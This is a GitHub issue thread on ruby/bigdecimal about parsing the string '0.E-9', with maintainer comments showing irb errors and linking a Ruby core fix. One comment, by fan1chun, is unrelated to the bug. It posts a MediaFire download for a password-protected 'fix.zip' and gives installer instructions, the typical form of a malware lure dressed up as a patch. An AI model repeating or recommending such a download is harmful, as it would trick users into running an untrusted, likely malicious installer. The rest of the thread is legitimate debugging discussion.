### ISSUE TITLE
Cannot parse '0.E-9'

### ISSUE THREAD

**Issue by datbth** [ruby/bigdecimal#301]
When working with Apache Arrow Decimals, I found that they use this string representation for zero (with precision 38, scale 9):
```
0.E-9
```
(I have also filed this [issue](https://github.com/apache/arrow/issues/43877) on Apache Arrow repo that includes more context)

But BigDecimal does not recognize `0.E-9`
![image](https://github.com/user-attachments/assets/41e4649e-d8ed-4bdd-9997-80cddde2de66)

I found that postgres also accepts `0.E-9`
![image](https://github.com/user-attachments/assets/2ec253b9-1065-45a4-8adf-68118bc2d338)

Will BigDecimal be able to support such string representation?

**Comment by mrkn** [comment]
`Float` does not recognize `0.E-9`, too.

```
irb(main):001> Float("0.E-9")
<internal:kernel>:214:in `Float': invalid value for Float(): "0.E-9" (ArgumentError)
	from (irb):2:in `<main>'
	from <internal:kernel>:187:in `loop'
	from /Users/mrkn/.rbenv/versions/3.3.1/lib/ruby/gems/3.3.0/gems/irb-1.13.2/exe/irb:9:in `<top (required)>'
	from /Users/mrkn/.rbenv/versions/3.3/bin/irb:25:in `load'
	from /Users/mrkn/.rbenv/versions/3.3/bin/irb:25:in `<main>'
```

I guess this behavior comes from the fact that `0.E` does not mean a Float literal, but the method call of the Integer `0` in Ruby:

```
irb(main):001> 0.E-9
(irb):1:in `<main>': undefined method `E' for an instance of Integer (NoMethodError)

0.E-9
 ^^
	from <internal:kernel>:187:in `loop'
	from /Users/mrkn/.rbenv/versions/3.3.1/lib/ruby/gems/3.3.0/gems/irb-1.13.2/exe/irb:9:in `<top (required)>'
	from /Users/mrkn/.rbenv/versions/3.3/bin/irb:25:in `load'
	from /Users/mrkn/.rbenv/versions/3.3/bin/irb:25:in `<main>'
```

**Comment by fan1chun** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kou** [comment]
https://bugs.ruby-lang.org/issues/20705

`Float()`/`.to_f` will accept `0.E-9`. `BigDecimal()` may want to do it too.

**Comment by mrkn** [comment]
@kou Could you please make a pull-request?
